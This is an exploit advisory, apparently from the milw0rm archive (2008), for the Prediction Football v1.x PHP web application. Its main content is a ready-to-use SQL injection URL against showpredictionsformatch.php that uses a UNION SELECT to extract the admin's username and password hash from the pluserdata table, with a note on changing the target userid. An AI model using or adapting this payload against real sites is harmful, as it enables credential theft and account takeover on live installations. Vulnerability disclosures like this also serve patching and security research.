31 lines
No EOL
1.1 KiB
Text
31 lines
No EOL
1.1 KiB
Text
/*
|
|
|
|
Prediction Football v 1.x Remote SQL INJECTION
|
|
|
|
Discovered by 0in from Dark-Coders Programming & Security Group.
|
|
|
|
!!!!!! > http://dark-coders.4rh.eu < !!!!!!
|
|
|
|
Contact: 0in(dot)email(at)gmail(dot)com
|
|
|
|
Greetz to all Dark-Coders Group Members: Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89
|
|
|
|
Script homepage: http://www.predictionfootball.com/
|
|
|
|
Description: Prediction Football is a program that provides a web based administration
|
|
config and automated prediction leagues. This program supports multiple languages. This
|
|
script makes predictions simultaneously. This helps you to message other users and capable
|
|
of multiple fixture creation. This requires web server with support for PHP4.0 or greater,
|
|
MySQL database. Very easy to download and install the program and execute.
|
|
|
|
*/
|
|
|
|
Exploit:
|
|
|
|
http://target.domain/[path]/showpredictionsformatch.php?sid=dupa&matchid=-666/**/union/**/select/**/1,2,3,concat(0x757365723a,username),concat(0x7061737377643a,password),6,7/**/from/**/pluserdata/**/WHERE/**/userid=1/*
|
|
|
|
userid=1 - admin user have that userid, you can change that to another user.
|
|
|
|
//EoFF
|
|
|
|
# milw0rm.com [2008-04-08] |